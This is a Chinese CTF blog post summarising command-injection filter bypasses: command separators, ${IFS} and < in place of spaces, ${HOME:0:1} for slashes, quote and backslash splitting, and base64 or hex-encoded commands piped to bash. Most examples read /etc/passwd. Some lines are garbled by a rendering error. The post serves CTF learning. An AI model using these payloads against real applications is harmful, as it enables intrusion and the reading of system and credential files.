[CTF技巧]命令注入绕过总结

最新推荐文章于 2024-08-12 09:39:04 发布
最新推荐文章于 2024-08-12 09:39:04 发布
阅读量3.6k 收藏 19
点赞数 3
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/luochen2436/article/details/118577191
版权

命令分隔符

cat /etc/passwd;ls

分号 ;
cmd1;cmd2(多条语句顺序执行)

在这里插入图片描述

cat /etc/passwd && ls

and &&

cmd1&&cmd2 与命令,cmd1成功则执行cmd2,cmd1失败则不执行cmd2

在这里插入图片描述

cat etc || ls

or ||

cmd1 || cmd2 cmd1执行失败则执行cmd2,若cmd1执行成功则不执行cmd2

在这里插入图片描述

管道符 |

| 管道符
管道符”|“左边的命令的输出会作为管道符”|“右边命令的输入

%0a、%0d

linux:
%0a 回车
%0d 换行
windows:
%0a 回车
%1a 作为.bat文件的命令分隔符

过滤空格绕过

使用<代替空格

cat /etc/passwd ---->>> cat</etc/passwd

在这里插入图片描述

使用${IFS}代替空格

cat /etc/passwd ---->>> cat${IFS}/etc/passwd

在这里插入图片描述

使用$IFS代替空格

cat /etc/passwd ---->>> cat$IFS/etc/passwd

在这里插入图片描述

过滤斜杠/绕过

使用${HOME:0:1}代替/

cat /etc/passwd ---->>> cat H O M E : 0 : 1 e t c {HOME:0:1}etc HOME:0:1etc{HOME:0:1}passwd

在这里插入图片描述

使用echo . | tr ‘!-0’ ‘"-1’ 代替/

cat /etc/passwd ---->>> cat KaTeX parse error: Double superscript at position 20: …o . | tr '!-0' '̲"-1')etc(echo . | tr ‘!-0’ ‘"-1’)passwd
注意:反引号``和$()用来表示命令执行,被这两种方式包含的字符串都会被当作命令优先执行
在这里插入图片描述

黑名单绕过

拼接绕过

a=nc1;b=.py;cat a a ab

在这里插入图片描述

单引号‘和双引号“绕过

cat n’c’1.py

在这里插入图片描述

cat n“c”1.py

在这里插入图片描述

反斜杠\绕过

cat n\c\1.py

在这里插入图片描述

利用Shell 特殊变量绕过
变量含义
$0当前脚本的文件名
$n传递给脚本或函数的参数。n 是一个数字,表示第几个参数。例如,第一个参数是1,第二个参数是2。而参数不存在时其值为空。
$#传递给脚本或函数的参数个数
$*传递给脚本或函数的所有参数,而参数不存在时其值为空。
$@传递给脚本或函数的所有参数。,而参数不存在时其值为空。被双引号包函时,与$*稍有不同
$?上个命令的推出状态,或函数的返回值
$$当前shell进程ID

注意:当上述变量的值为空时,使用变量穿插在黑名单字符中即可绕过黑名单限制

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

编码绕过

核心:利用管道符”|“将左边命令的输入作为右边命令的输出

base64编码绕过

注意:反引号``和$()用来表示命令执行,被这两种方式包含的字符串都会被当作命令优先执行

echo “Y2F0IG5jMS5weQ==”|base64 -d|bash

echo Y2F0IG5jMS5weQ== | base64 -d

$(echo Y2F0IG5jMS5weQ== | base64 -d)

执行顺序:输出base64编码内容------>base64解码其编码内容------>执行bash命令

在这里插入图片描述

16进制编码绕过

echo “636174206E63312E7079”|xxd -r -p|bash

在这里插入图片描述

通配符绕过
字符含义
*匹配任意长度任意字符
匹配任意单个字符

在这里插入图片描述

在这里插入图片描述

3tefanie丶zhou
关注
命令注入绕过技巧总结
weixin_41082546的博客
05-05 3478
命令注入绕过技巧总结 命令注入是一个安全漏洞,它使攻击者可以在易受攻击的应用程序中执行任意命令。 基本命令 root@micr067:~# cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin...
CTF入门web篇17命令执行相关函数及绕过技巧讲解
anquanniu的博客
10-12 2045
命令注入和代码注入区别 之前我们讲过的都是代码注入注入的代码相当于网页中新的代码,比如去执行数据库读取的操作,我们想办法插入一段代码去执行,这就是代码执行。 命令注入 命令注入执行的是系统中的命令,使目标服务器的命令在目标服务器上去执行我们想要执行的命令,系统命令的执行还是要基于某些函数的调度去实现的。 1、system函数 例如system函数执行系统命令并输出相应的结果: String ...
ctf-综合过滤练习
m0_62094846的博客
12-16 1115
过滤了空格,也过滤了运算符 过滤了运算符,绕过的方式有%0a、%0d、%0D%0A 127.0.0.1%0als 过滤了flag,cat,ctfhub,想办法绕过 \ '' 可以绕过,其他没有被过滤的符号也可以试试 127.0.0.1%0als${IFS}fl''ag_is_here 127.0.0.1%0acd${IFS}fl''ag_is_here%0ac''at%24{IFS}fl''ag_137911774817149.php ...
命令注入绕过过滤)
最新发布
qq_69100706的博客
08-12 357
当遇到命令注入挑战且发现一些关键字符或命令被过滤时,如cat命令、空格、目录分隔符(或)和运算符(如;&&||),这增加了攻击的难度,但并非不可能克服。
命令注入以及常见绕过方式
Manuffer的博客
10-11 3961
命令注入及常见绕过方式
命令注入绕过方式总结
cainsoftware的博客
10-09 1719
前言 命令注入是web中常见的漏洞之一,由于web应用程序未对用户提交的数据做严格的过滤,导致用户输入可以直接被linux或windows系统当成命令执行,一般都会造成严重的危害。 常用符号 分号(;) 多条语句顺序执行时的分割符号。 cmd1;cmd2 管道符(|) cmd1命令的输出,作为下一条命令cmd2的参数。 cmd1|cmd2 and(&&) 与命令,cmd1成功则执行cmd2,cmd1失败则不执行cmd2 cmd1 && cmd2
红帽Redhat—Linux文本处理
m0_52812401的博客
12-30 773
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码
CG-CTF 综合题2(sql注入绕过注入技巧、preg_replace()漏洞)☆
Sea_Sand息禅
03-19 5805
这道题确实综合性挺强的。 1、老程序,先收集信息。 页面可以输入的地方可以输入些信息试试,搜索框输入1,会转到so.php,这里是有sql查询的。 留言的地方,输入可以转到preview.php,预览之后转到say.php。 最下面有个“本CMS说明”,这个点击之后会得到更多的信息: config.php index.php passencode.php say.php sm.txt 还给了我们...
CTFHUB-RCE通关记录以及常见的绕过过滤的方法
不想当脚本小子的脚本小子
03-21 2203
先过关,再分析相关的防御源代码 1.过滤cat 然后cat 301472130920273.php然后查看网页源代码即可得到flag 2.过滤cat 根据题目要求过滤了cat 而该服务器为Linux系统区分大小写 就无法通过大小写来绕过 本来想使用vi命令替换cat命令也能查看到flag中的内容 但是失败了 最后用了替换法:127.0.0.0 ; $a=ca;$b=t; $a$b flagxxxx 题目源码: <?php $res = FALSE; if (is.
python 重定向 ctf_CTF web题型解题技巧 第四课 web总结
weixin_39615984的博客
12-10 750
以下内容大多是我在学习过程中,借鉴前人经验总结而来,部分来源于网络,我只是在前人的基础上,对CET WEB进行一个总结;----------------------------------------------------------------------------------------------------------------------工具集:基础工具:Burpsuite,pyt...
CTF-Web-SQL注入
beihai2013
01-26 3297
题目目录参考https://ca01h.top/Web_security/ctf_writeup/8.buuctf%E5%88%B7%E9%A2%98%E2%80%94%E2%80%94XSS/ 随便注 题目来源:强网杯2019 题目链接:https://buuoj.cn/challenges#[%E5%BC%BA%E7%BD%91%E6%9D%AF%202019]%E9%9A%8F%E4%BE%BF%E6%B3%A8 考察:堆叠注入,sql的show语句,sql的预编译,sql修改表 参考:https:/
Linux/CTF命令注入绕过
Mr_Shiyang的博客
08-15 4501
第一题:题目链接 打开题目直接给了源码, <?php $str=""; if(!empty($_GET)){ $str=$_GET["calc"]; } ?> 以及 <?php echo "result:".shell_exec("echo $str | bc"); ?> 可以看出其没有对用户输入的内容进行一定过滤直接传给shell_exec函数执行。所以存在命令行漏洞。 这里只要用;或者&&将shell_exec中的echo给截断即可执行我们想要执
CTF-命令注入绕过技巧总结
键盘的起始页
04-10 468
执行顺序:输出base64编码内容------>base64解码其编码内容------>执行bash命令。cmd1 || cmd2 cmd1执行失败则执行cmd2,若cmd1执行成功则不执行cmd2。注意:反引号``和$()用来表示命令执行,被这两种方式包含的字符串都会被当作命令优先执行。cmd1&&cmd2 与命令,cmd1成功则执行cmd2,cmd1失败则不执行cmd2。管道符”|“左边的命令的输出会作为管道符”|“右边命令的输入。核心:利用管道符”|“将左边命令的输入作为右边命令的输出。
【WEB】命令注入(基础知识讲解及绕过姿势)(更新中)
weixin_45844670的博客
08-24 1416
通过web程序,在服务器上拼接系统命令。基础知识命令注入的条件:PHP执行系统命令的函数:&,&&,|,|| 的区别:漏洞利用服务器进行参数过滤空格代替截断符号利用base编码绕过过滤了敏感命令对比和文件上传漏洞对比和远程代码执行对比工具的使用防护白名单保护黑名单保护 基础知识 正常情况下,是ping一个IP地址。确定调用系统命令 确定可控字段 确定命令语句,&&可以连接两条Windows命令 命令注入的条件: web应用程序调用可执行系统命令的函数 执行系统命令
渗透测试-命令执行注入
lza20001103的博客
07-20 3372
渗透测试-命令执行注入
【网络安全---Linux命令绕过】Linux下命令执行绕过技巧(很全,很实用)
m0_67844671的博客
09-24 2855
Linux下命令执行绕过方式和思路;网站上可能有一些能执行系统命令的地方,但是对一些关键字和空格等做了一些防护,如何绕过就成了一个难题,这篇文章分享一些Linux下的命令执行绕过技巧以及思路,不如说空格的绕过,关键字绕过,编码绕过等等;
关于命令执行/注入 以及常见的一些绕过过滤的方法
热门推荐
小白渣的博客
02-29 1万+
打开题目直接给了源码, <?php $str=""; if(!empty($_GET)){ $str=$_GET["calc"]; } ?> 以及<?php echo "result:".shell_exec("echo $str | bc"); ?> 可以看出其没有对用户输入的内容进行一定过滤直接传给shell_exec函数执行。所以存在命令行漏洞。 这...
CTF命令执行常见绕过
qq_42383069的博客
04-18 5691
在 linux 下表示分隔符,只有cat$IFSa.txt 的时候, bash 解释器会把整个 IFSa当做变量名,所以导致没有办法运行,然而如果加一个 {} 就固定了变量名,同理在后面加个 $ 可以起到截断的作用,而 $9 指的是当前系统shell 进程的第九个参数的持有者,就是一个空字符串,因此 $9 相当于没有加东西,等于做了一个前后隔离。]有一个重要的区别,当匹配的文件不存在,[…通过测试,可见程序过滤了截断符,根据以上的知识,我们来fuzz一下可用的截断符。根据burp爆破,发现可以通过。
CTF挑战:绕过过滤执行命令技巧解析
"ctfshow-web41~60-WP 是一系列关于网络安全竞赛(CTF,Capture The Flag)中的Web安全题目,主要涉及命令注入漏洞的利用与绕过技巧。这些题目逐步增加难度,帮助参赛者提升在实战中发现和解决安全问题的能力。" 在...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值